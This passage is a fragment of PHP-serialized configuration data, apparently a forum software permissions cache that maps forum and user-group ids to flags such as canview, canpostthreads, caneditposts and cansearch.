;s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}}i:46;a:3:{i:1;a:18:{s:3:\"pid\";s:3:\"311\";s:3:\"fid\";s:2:\"46\";s:3:\"gid\";s:1:\"1\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:10;a:18:{s:3:\"pid\";s:3:\"809\";s:3:\"fid\";s:2:\"46\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:15;a:18:{s:3:\"pid\";s:3:\"312\";s:3:\"fid\";s:2:\"46\";s:3:\"gid\";s:2:\"15\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}}i:15;a:2:{i:5;a:18:{s:3:\"pid\";s:3:\"134\";s:3:\"fid\";s:2:\"15\";s:3:\"gid\";s:1:\"5\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:10;a:18:{s:3:\"pid\";s:3:\"135\";s:3:\"fid\";s:2:\"15\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}}i:20;a:1:{i:10;a:18:{s:3:\"pid\";s:3:\"809\";s:3:\"fid\";s:2:\"20\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}}i:21;a:1:{i:10;a:18:{s:3:\"pid\";s:3:\"809\";s:3:\"fid\";s:2:\"21\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}}i:16;a:3:{i:5;a:18:{s:3:\"pid\";s:3:\"828\";s:3:\"fid\";s:2:\"16\";s:3:\"gid\";s:1:\"5\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:10;a:18:{s:3:\"pid\";s:3:\"829\";s:3:\"fid\";s:2:\"16\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:15;a:18:{s:3:\"pid\";s:3:\"830\";s:3:\"fid\";s:2:\"16\";s:3:\"gid\";s:2:\"15\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}}i:17;a:3:{i:5;a:18:{s:3:\"pid\";s:3:\"753\";s:3:\"fid\";s:2:\"17\";s:3:\"gid\";s:1:\"5\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:10;a:18:{s:3:\"pid\";s:3:\"754\";s:3:\"fid\";s:2:\"17\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:15;a:18:{s:3:\"pid\";s:3:\"830\";s:3:\"fid\";s:2:\"17\";s:3:\"gid\";s:2:\"15\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}}i:45;a:11:{i:1;a:18:{s:3:\"pid\";s:3:\"463\";s:3:\"fid\";s:2:\"45\";s:3:\"gid\";s:1:\"1\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:2;a:18:{s:3:\"pid\";s:3:\"464\";s:3:\"fid\";s:2:\"45\";s:3:\"gid\";s:1:\"2\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:5;a:18:{s:3:\"pid\";s:3:\"465\";s:3:\"fid\";s:2:\"45\";s:3:\"gid\";s:1:\"5\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:8;a:18:{s:3:\"pid\";s:3:\"466\";s:3:\"fid\";s:2:\"45\";s:3:\"gid\";s:1:\"8\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:10;a:18:{s:3:\"pid\";s:3:\"467\";s:3:\"fid\";s:2:\"45\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:12;a:18:{s:3:\"pid\";s:3:\"468\";s:3:\"fid\";s:2:\"45\";s:3:\"gid\";s:2:\"12\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:13;a:18:{s:3:\"pid\";s:3:\"469\";s:3:\"fid\";s:2:\"45\";s:3:\"gid\";s:2:\"13\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:15;a:18:{s:3:\"pid\";s:3:\"470\";s:3:\"fid\";s:2:\"45\";s:3:\"gid\";s:2:\"15\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:17;a:18:{s:3:\"pid\";s:3:\"471\";s:3:\"fid\";s:2:\"45\";s:3:\"gid\";s:2:\"17\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"1\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:20;a:18:{s:3:\"pid\";s:3:\"657\";s:3:\"fid\";s:2:\"45\";s:3:\"gid\";s:2:\"20\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:21;a:18:{s:3:\"pid\";s:3:\"773\";s:3:\"fid\";s:2:\"45\";s:3:\"gid\";s:2:\"21\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}}i:18;a:1:{i:10;a:18:{s:3:\"pid\";s:3:\"809\";s:3:\"fid\";s:2:\"18\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}}i:43;a:4:{i:5;a:18:{s:3:\"pid\";s:3:\"824\";s:3:\"fid\";s:2:\"43\";s:3:\"gid\";s:1:\"5\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:8;a:18:{s:3:\"pid\";s:3:\"825\";s:3:\"fid\";s:2:\"43\";s:3:\"gid\";s:1:\"8\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:10;a:18:{s:3:\"pid\";s:3:\"826\";s:3:\"fid\";s:2:\"43\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:15;a:18:{s:3:\"pid\";s:3:\"827\";s:3:\"fid\";s:2:\"43\";s:3:\"gid\";s:2:\"15\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}}i:51;a:1:{i:10;a:18:{s:3:\"pid\";s:3:\"813\";s:3:\"fid\";s:2:\"51\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}}i:69;a:1:{i:10;a:18:{s:3:\"pid\";s:3:\"813\";s:3:\"fid\";s:2:\"69\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}}i:52;a:1:{i:10;a:18:{s:3:\"pid\";s:3:\"813\";s:3:\"fid\";s:2:\"52\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}}i:53;a:1:{i:10;a:18:{s:3:\"pid\";s:3:\"813\";s:3:\"fid\";s:2:\"53\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}}i:67;a:1:{i:10;a:18:{s:3:\"pid\";s:3:\"813\";s:3:\"fid\";s:2:\"67\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}}i:68;a:1:{i:10;a:18:{s:3:\"pid\";s:3:\"813\";s:3:\"fid\";s:2:\"68\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}}i:31;a:11:{i:1;a:18:{s:3:\"pid\";s:3:\"436\";s:3:\"fid\";s:2:\"31\";s:3:\"gid\";s:1:\"1\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s: